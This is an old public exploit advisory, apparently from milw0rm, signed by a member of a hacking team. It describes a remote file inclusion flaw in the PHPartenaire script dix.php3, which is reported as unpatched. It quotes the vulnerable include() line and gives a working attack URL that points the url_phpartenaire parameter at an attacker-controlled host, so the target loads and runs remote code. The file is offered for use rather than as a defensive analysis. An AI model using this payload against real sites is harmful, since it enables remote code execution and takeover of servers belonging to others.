47 lines
No EOL
1.4 KiB
Text
47 lines
No EOL
1.4 KiB
Text
#===================================================================================#
|
|
#
|
|
# PHPartenaire => $url_phpartenaire Remote File Inclusion Exploit
|
|
#
|
|
#===================================================================================#
|
|
#
|
|
# Softname : PHPartenaire
|
|
# Url : http://ograweb.free.fr/phpartenaire/
|
|
# Exploit type : Remote File Inclusion.
|
|
# Critical: Dangerous.
|
|
# Solution Status: Unpatched.
|
|
#
|
|
#===================================================================================#
|
|
#
|
|
# By DaDIsS - Member of the Moroccan Hackers Team
|
|
#
|
|
#===================================================================================#
|
|
#
|
|
# Exploit Explanation :
|
|
#
|
|
#
|
|
# The flaw resides in dix.php3 file that contain this code :
|
|
#
|
|
# in line 9 :
|
|
#
|
|
# include($url_phpartenaire."/config.php3");
|
|
#
|
|
#===================================================================================#
|
|
#
|
|
# Example :
|
|
#
|
|
#
|
|
# http://www.victime.com/(path)/dix.php3?url_phpartenaire=http://attacker
|
|
#
|
|
#
|
|
#================================================================#
|
|
#
|
|
# Greetz : YouYouCool, Hacker1, and all Moroccan Hackers Team, viva Morocco guyz !!
|
|
#
|
|
#===================================================================================#
|
|
#
|
|
# DaDIsS / dadiss@virtuaplanet.net
|
|
# Proud to be a Moroccan !
|
|
#
|
|
#===================================================================================#
|
|
|
|
# milw0rm.com [2006-09-21] |